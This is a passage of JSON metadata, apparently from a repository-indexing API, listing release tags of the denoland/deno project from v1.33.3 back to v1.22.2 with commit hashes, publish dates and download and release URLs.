url":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/h